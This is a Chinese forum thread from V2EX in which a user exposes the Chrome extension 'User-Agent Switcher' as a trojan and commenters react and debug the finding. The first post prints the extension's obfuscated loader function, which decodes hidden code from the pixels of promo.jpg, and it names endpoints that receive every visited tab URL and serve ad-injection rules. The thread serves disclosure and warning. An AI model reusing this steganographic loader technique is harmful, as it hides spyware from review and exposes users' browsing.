V2EX › 浏览器
大家注意了 Chrome 的插件 User-Agent Switcher 是个木马
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...
chrome.google.com/webstore/de…
为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里
background.js 的第 80 行,从这个图片里解密出恶意代码并执行
t.prototype.Vh = function(t, e) {
if ("" === '../promo.jpg') return "";
void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.pow(2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
if (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
if (1 === o)
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
会把你打开的每个 tab 的 url 等信息加密发送到 uaswitcher.org/logic/page/…
另外还会从 api.data-monitor.info/api/bhrule?… 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( x.threatbook.cn/domain/api.… ),我估计下面的几个插件都是这个作者的作品..
这里也有人讨论这个问题 news.ycombinator.com/item?id=148…
105 回复 | 直到 2017-09-11 11:52:12 +08:00| 1 2 |
|
| gzlock 2 天前 via Android ♥ 2 真的变 agent 了,赶紧起床删掉 |
| kmahyyg 2 天前 via Android 天呐,等我回去看下 |
| sunbeams001 2 天前 简直可怕 |
| Antidictator 2 天前 via Android 我擦。。 |
| t123yh 2 天前 via Android 真 TM 吓人啊 |
| torbrowserbridge 2 天前 via Android 我擦,估计早就财务自由了 |
| whwq2012 2 天前 via Android 还好我早就不用 ua 切换工具了 |
| ahhui 2 天前 via iPhone 卧槽,起床去删 |
| houbaron 2 天前 via Android 我现在正用着呢。。。有什么替代产品呢? |
| torbrowserbridge 2 天前 via Android 奇怪楼主是怎么发现的呢,赞 |
| wave3c 2 天前 用了好多年了 惊悚 |
| mylanch 2 天前 via iPhone google 官方会有什么行动 |
| liyiecho 2 天前 ♥ 4 看了下我用的是谷歌提供的 User-Agent Switcher for Chrome @houbaron #9 chrome.google.com/webstore/de… |
| dong3580 2 天前 via Android 这个用了一次就删了,替换成别的了,害怕,都删了得了。firefox 那个一样名字的呢? @liyiecho 这个居然是官方的,还好😂没中招, |
| Cambrian07 2 天前 ♥ 1 @liyiecho 删完了发现,我的也是谷歌提供的这个,又默默装上了…… |
| crystom 2 天前 我曹,已中招,还好我只是使用的时候才启用这个扩展 |
| anoymoux 2 天前 @dong3580 firefox 也不安全,这家伙写的插件大部分都提供了 firefox,opera 版本的,我列出的这几个仅在 chrome 平台就有超过 100 万用户 |
| anoymoux 2 天前 唉,这个插件我装了几年了,想想这几年都在这个俄罗斯黑客的监控之下,挺恶心的... |
| qlbr 2 天前 chrome.google.com/webstore/de… 请问是不是这个, 没梯子好捉急 |
| honk 2 天前 via Android 用 dev tools 自己随便加 |
| akwIX 2 天前 @qlbr #19 是 |
| akwIX 2 天前 我现在用的这个 chrome.google.com/webstore/de… |
| crisfun 2 天前 via iPhone 晚上来看看 |
| doubleflower 2 天前 尽量不要装俄国人写的插件。。。 |
| infun 2 天前 @Cambrian07 囧...+1 |
| lpy6759 2 天前 删除代码能解决木马吗 |
| lantianqiren 2 天前 楼主好人啊···· |
| deeporist 2 天前 吃了一惊 还好我 chrome 是用 smart header 自己改的 不过 firefox 里倒是留了一个 刚才一看好像作者就是个毛子立马删之 不过 ff 里的这个我几乎就没用过就是了 改 ua 都是直接用 umatrix |
| fzhw88 2 天前 via Android @liyiecho 我也是用的这个 |
| qa2080639 2 天前 赶紧删了... |
| zro 2 天前 还好 Chrome 这几个插件都没装过 @deeporist #28 FF 我用的是这个 addons.mozilla.org/en-US/firef… |
| zhuziyi 2 天前 via iPhone 卧槽,先卸载为敬,快来人进一步核实。 |
| dong3580 2 天前 @zro 我火狐上也是这个,不知道有没有问题, |
| paradoxs 2 天前 浏览器扩展的权限简直不要太大, 还能自动更新, 除了超级重要的扩展, 别的能不开就不开. |
| ihciah 2 天前 via iPhone 好多插件都被买了然后插后门代码。以前中过一个好像叫 Web timer 发现总是跳转返利链接,查了下源码惊了。。 |
| shiloh77 2 天前 Firefox 上這位作者是用什麼名字呢? 有點害怕自己也裝到他的插件... 感謝 lz |
| ynyounuo 2 天前 ♥ 2 很不幸,恐怕很多人已经被荼毒一年半了。 /t/263719 |
| jfdnet 2 天前 记得这个之前有专门文章发过 有好几个有名的插件 是被出售了之后改造了 |
| xujinkai 2 天前 吓得我把平时不用的插件都禁用了 |
| lechain 2 天前 一直用的 SwitchyOmega,不会有事吧? |
| zuolan 2 天前 可怕,感谢曝光。 |
| hjdtl 2 天前 已经和 chrome 联系了 |
| salary123 2 天前 via Android 这么久才有人发现。幸亏不是在常用浏览器上使用 |
| saran 2 天前 via Android 还好宝宝不用代理(๑°3°๑) |
| ghost444 1 天前 @anoymoux AMO 的扩展都是人工审核过的,比起 Chrome Web Store 肯定要好一点…… |
| iyangfei 1 天前 还好没有用这个 |
| UnisandK 1 天前 卧槽惊了 |
| EchoChan 1 天前 @qlbr #19 楼主说的就是这个。 |
| Clooody 1 天前 要是真的,去 google 商店那里举报一下也好啊,免得后来人遭殃. |
| showgood163 1 天前 via Android 感谢楼主提醒。目前没在用这些扩展。? |
| doubleflower 1 天前 电脑上的 npm 包成千上万,只要其中有一个人想干点坏事或是 npm 帐号被盗。。。那破坏力比插件强不止一点啊。 |
| 7654 1 天前 哈哈我用火狐,托管在 github 的 User Agent Overrider 扩展 |
| mjar 1 天前 没装,但是我想看看那张图片长什么样... |
| mjar 1 天前 /~~ |
| exoticknight 1 天前 感谢,已卸载 |
| liaoyaoheng 1 天前 举报一下,尽自己一份力。 |
| schema 1 天前 已举报,谢谢分享~ |
| 172055 1 天前 去年就有了... |
| yukiww233 1 天前 吓死我了,结果发现自己用的是 google 的那个,赶紧举报 |
| skadi 1 天前 via Android 没用过。。。 |
| hantsy 1 天前 @ynyounuo 抱歉,没仔细看清楚。 |
| drwx 1 天前 我用的 Header Hacker,和谷歌官方的那个插件同一作者,不过没有谷歌官方内置的 UA 列表,要自己添加,但是界面上来说似乎好用一点(?)。 |
| tbag781623489 1 天前 via iPhone 感谢一下,怪不得经常 pop up 一些鬼佬推广。以后只能油猴或者自己写了 |
| MaxMadcc 1 天前 @anoymoux 这插件就只把 tab 的 url 信息上传上去了吗? |
| achendian2 1 天前 恐怖 删 |
| LuoboTixS 1 天前 Chrome 商店里的排名头部免费热门插件,若常年不断更新、功能已经成熟定型的话,都应该考虑是否有偷数据甚至改页面内容(广告跳转)的后门风险,不然 Dev 喝西北风啊? 英文互联网还有很多靠万能关键词 SEO 引诱点击下载的伪工具软件(广告木马)能把浏览器抽插的七窍流血,但根本不报毒也难定位 |
| kappa 1 天前 用 chrome.google.com/webstore/de… offered by google.com |
| xcc880 1 天前 0.0 装了好久 |
| acess 1 天前 为啥我看着那么眼熟呢: Chrome 扩展被出售被加入恶意代码 www.solidot.org/story?mode=… |
| Kingfree 1 天前 这家伙有问题怎么没被举报掉? |
| xspoco 1 天前 我竟然装了。。赶紧删了。。 |
| redsonic 1 天前 折腾了一下,没发现任何数据泄漏给那个域名。 t.prototype.Vh 这个调用过程中没有参数,导致 if (u.style.display = "none", u.width || t.width, u.height || t.height, 0 === u.width || 0 === u.height) return ""; 直接 return,也就没法知道 hack 的代码藏在图片的哪个位置 就算注释掉掉这句,由于 canvas 没有绘图,所以 d 里面是全 0 var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = []; if (c.data.every(function(t) { return 0 === t })) return ""; 最后也是 return,到不了后面的解码。LZ 应该分享一下怎么知道里面藏着什么东西的。我不是替这个插件说话,只是想知道实际的受害程度,load 一个图片然后跑了一大段混淆的代码确实没安什么好心。 |
| 15015613 1 天前 ♥ 2 @zro @shiloh77 FireFox 上 User Agent Switcher ( addons.mozilla.org/en-US/firef… 这个是开源的,源代码在这 github.com/chrispederi… |
| lingaoyi 1 天前 via iPhone 好恐怖.... |
| Haiwx 1 天前 @15015613 最后一次更新 January 4, 2011,手动摊手 |
| cyg07 1 天前 @redsonic 360 的分析报告里是有上传信息的 mp.weixin.qq.com/s?__biz=MzU… |
| xi_lin 1 天前 中奖了 |
| redsonic 1 天前 @cyg07 cert.360.cn/warning/det… 然而还是不清不楚,没有文件 hash,没有署名,没有提图片里藏什么了以及藏哪了。我实际验证了这个插件,80 行确实加载了 promo.jpg ,但后面马上就返回了。可能实际危害要小很多。 |
| anoymoux 21 小时 16 分钟前 ♥ 1 @redsonic 费了那么大劲把代码藏在图片里,怎么可能执行一下就返回了...你把那一行提取出来 debug 跟踪一下就明白了,下面两段代码是解密出来的
pastebin.com/ZYd82Hkm pastebin.com/gXV094wm 虽然混淆了,但是还是很容易看出木马行为的...这作者还是挺狡猾的,刚安装之后不会触发监控模块,24 小时之后才会. 另外 chrome 的 F12 network 里看不到插件发送的请求,这也是很多恶意插件能够存在这么长时间原因...如果想看某一个插件发送的请求,在 chrome://extensions/点击插件->背景页,选择 network 就能看到了 |
| redsonic 20 小时 26 分钟前 @anoymoux d=c.data,g=[];console.log(d) 打印出来是全 0 然会就返回了,应该是这个图片显示出来的时候才解密代码,我抓了两天的包都没抓到,chrome 59 源代码 hook 了 url request 也没看到有相关域名,是有什么触发条件吗? 你是随便开一个 tab 就能抓到? |
| redsonic 18 小时 40 分钟前 @anoymoux 谢谢,直接在 extensions 里面就地调试 可以解出代码了,只不过第一次 getImageData 还是全 0,要第二次才行 。 把那段单独抽出来不管怎么调试都是 return。不过解出来的混淆代码还是没发出任何东西,在里面循环了一段就退出了,应该还是需要什么条件。 |
| redsonic 18 小时 22 分钟前 这部分是什么 pastebin.com/gXV094wm 我解出的代码是这部分 pastebin.com/ZYd82Hkm @anoymoux |
| 1 2 |
|
